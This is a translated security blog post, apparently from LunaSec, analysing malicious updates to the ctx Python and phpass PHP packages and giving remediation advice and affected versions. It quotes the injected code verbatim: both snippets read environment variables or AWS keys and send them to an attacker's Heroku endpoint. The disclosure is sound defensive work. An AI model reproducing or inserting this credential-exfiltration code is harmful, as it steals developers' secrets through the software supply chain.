Trang chủ » Làm thế nào hai phụ thuộc Python và PHP, ctx và Phpass, trở thành phần mềm độc hại đánh cắp bí mật và thông tin đăng nhập

Làm thế nào hai phụ thuộc Python và PHP, ctx và Phpass, trở thành phần mềm độc hại đánh cắp bí mật và thông tin đăng nhập

bởi Phạm Đại Nghĩa
0 bình luận
Ảnh chụp màn hình của tweet Twitter ctx


Trong bài đăng này, chúng tôi sẽ xem xét mã độc hại đã được giới thiệu cho cả hai ctxphpass.

Ảnh chụp màn hình của tweet Twitter ctx

Tweet từ @ s0md3v thông báo cho cộng đồng nhà phát triển về ctx.

Mã độc hại trong ctx

Sau 7 năm, gói Python ctx trên PyPi đã nhận được bản cập nhật phiên bản. Một phiên bản độc hại của ctx được xuất bản dưới 0.2.2 như một bản cập nhật cho trước đó 0.1.2.

Mã sau đã được thêm vào gói:

def __init__(self):
self.sendRequest()




def sendRequest(self):
string = ""
for _, value in environ.items():
string += value+" "

message_bytes = string.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')

response = requests.get("https://anti-theft-web.herokuapp.com/hacked/"+base64_message)

Tổng quan về mã phần mềm độc hại

Mã này thực hiện như sau:

  1. Đọc tất cả các biến Môi trường (có khả năng chứa các giá trị nhạy cảm như thông tin đăng nhập cho AWS hoặc cơ sở dữ liệu),
  2. Chuyển đổi các giá trị thành base64 mã hóa để cho phép truyền tải qua HTTP,
  3. Cuối cùng, nó gửi một yêu cầu HTTP với các biến môi trường bị rò rỉ đến Ứng dụng Heroku của kẻ tấn công.

Phpass chứa phần mềm độc hại tương tự

Thư viện PHP trên Composer Phpass cũng được cập nhật với mã độc hại giống hệt nhau trong cùng thời gian.

Ảnh chụp màn hình của tweet Twitter của Phpass

Tweet từ @ s0md3v thông báo cho cộng đồng nhà phát triển về Phpass.

Mã độc hại đã được thêm vào gói này là:

$access = getenv('AWS_ACCESS_KEY');
$secret = getenv('AWS_SECRET_KEY');
$xml = file_get_contents('http://anti-theft-web.herokuapp.com/hacked/$access/$secret');

Từ Bài đăng trên blog Sonatype

Hầu hết người dùng Phpass không bị ảnh hưởng

May mắn thay, Gói PHP bắt nguồn từ kho lưu trữ bị ảnh hưởng
hautelook / phpass
đã không nhận được nhiều lượt tải xuống trong những tháng qua. Thay vào đó, bưu kiện
cho kho lưu trữ được phân nhánh bordoni / phpass đã bắt đầu chủ yếu được sử dụng bởi các nhà phát triển trước khi mã độc được xuất bản.

Các biểu đồ dưới đây hiển thị số lượt tải xuống của các gói từ Packagist (trình soạn thảo cung cấp năng lượng đăng ký Gói PHP):

tải xuống hàng tháng của thư viện hautelook / phpass

Tải xuống hàng tháng của hautelook/phpass (phiên bản độc hại)

tải xuống hàng tháng của thư viện bordoni / phpass

Tải xuống hàng tháng của bordoni/phpass (ngã ba an toàn)

Tất cả các thư viện đã được gỡ xuống bây giờ. Cách đơn giản nhất để xác minh rằng bạn an toàn là cập nhật lên các phiên bản gói mới nhất.

Nếu cập nhật không phải là một tùy chọn, bạn cũng có thể xác minh rằng bạn không sử dụng bất kỳ phiên bản gói nào sau đây.

Các phiên bản gói bị ảnh hưởng

  • ctx phiên bản 0.2.20.2.6 (Python)
  • Phpass phiên bản không xác định (PHP)

Tài liệu tham khảo bên ngoài

Trong một thời gian giới hạn, hãy yêu cầu một chuyên gia đánh giá bảo mật

Mặc dù có lẽ khác thường, nhưng nhóm Kỹ sư bảo mật của chúng tôi đã làm việc với các công ty khởi nghiệp để kiểm tra sự phụ thuộc của họ và giúp họ quản lý lộ trình bảo mật của mình.

Tại sao? Thật đơn giản: Bằng cách làm việc với chúng tôi, chúng tôi cũng tìm hiểu về những vấn đề phổ biến mà các công ty gặp phải khi vận chuyển phần mềm. Giúp bạn cho phép chúng tôi cải tiến phần mềm Nguồn mở của mình tốt hơn.

Để bắt đầu, vui lòng gửi email cho chúng tôi theo địa chỉ deps@lunasec.io hoặc
lên lịch một cuộc gọi 15 phút với một trong những kỹ sư của chúng tôi.

Chúng ta là ai?

Nếu bạn đã nghe nói về Log4Shell hoặc Spring4Shell, thì bạn đã quen thuộc với công việc của chúng tôi rồi! Chúng tôi là các chuyên gia bảo mật đã đặt tên cho các lỗ hổng đó bằng cách đưa ra lời khuyên rõ ràng, ngắn gọn và
xây dựng công cụ để giải quyết chúng.

Kể từ đó, chúng tôi đã phỏng vấn hàng trăm công ty để giúp chúng tôi xây dựng
LunaTrace.

LunaTrace là gì? Đó là nền tảng bảo mật Nguồn mở của chúng tôi tự động phát hiện ra các lỗ hổng bảo mật trong các phần phụ thuộc của bạn và cung cấp cho bạn các hướng dẫn bảo mật chuyên nghiệp với các bước khắc phục và các bản vá tự động.

Cho dù bạn là nhà phát triển hay chuyên gia bảo mật, chúng tôi rất muốn nghe ý kiến ​​của bạn! Thả chúng tôi một dòng qua
tham gia Slack của chúng tôi hoặc dùng thử LunaTrace trên GitHub repo miễn phí.

Cập nhật

  1. Bài đăng gốc vào 2022-05-24 @ 5pm PDT
  2. Đã thêm thông tin chi tiết về các gói vào 2022-05-25 @ 1:30 sáng giờ UTC

.





Nguồn: www.lunasec.io | Dịch bởi: Kênh Viễn Thông

Có thể bạn thích

Để lại một bình luận